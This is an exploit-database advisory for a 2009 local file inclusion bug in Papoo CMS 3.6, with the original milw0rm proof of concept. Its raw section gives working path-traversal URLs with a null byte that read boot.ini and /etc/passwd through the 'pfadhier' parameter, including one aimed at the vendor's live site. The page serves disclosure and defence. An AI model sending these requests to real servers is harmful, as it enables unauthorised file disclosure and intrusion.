Papoo CMS 3.6 Local File Inclusion

vendor:

Papoo CMS

by:

SirGod

8.8

CVSS

HIGH

Local File Inclusion

CWE

Product Name: Papoo CMS

Affected Version From: 3.6

Affected Version To: 3.6

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Papoo CMS 3.6 Local File Inclusion

Papoo CMS 3.6 is vulnerable to Local File Inclusion. An attacker can exploit this vulnerability to include local files on the server. This can be exploited to view sensitive files on the server or to execute arbitrary code. The vulnerability is caused due to the 'pfadhier' parameter in 'message_class.php' script not properly sanitized before being used to include files. This can be exploited to include arbitrary files from local resources.

Mitigation:

Upgrade to the latest version of Papoo CMS 3.6

Source

Exploit-DB raw data:

#########################################################################################################
[+] Papoo CMS 3.6 Local File Inclusion
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
[+] www.hellzone.info
#########################################################################################################

[+] Script Homepage : http://www.papoo-cms.com/

[+] Local File Inclusion

- PoC :

    http://127.0.0.1/[path]/lib/classes/message_class.php?pfadhier=[Local
File]%00

- Example :

     http://127.0.0.1/path/lib/classes/message_class.php?pfadhier=../../../../../../boot.ini%00

- Live Demo

     http://www.papoo-cms.com/lib/classes/message_class.php?pfadhier=../../../../../../etc/passwd%00

#########################################################################################################

# milw0rm.com [2009-02-10]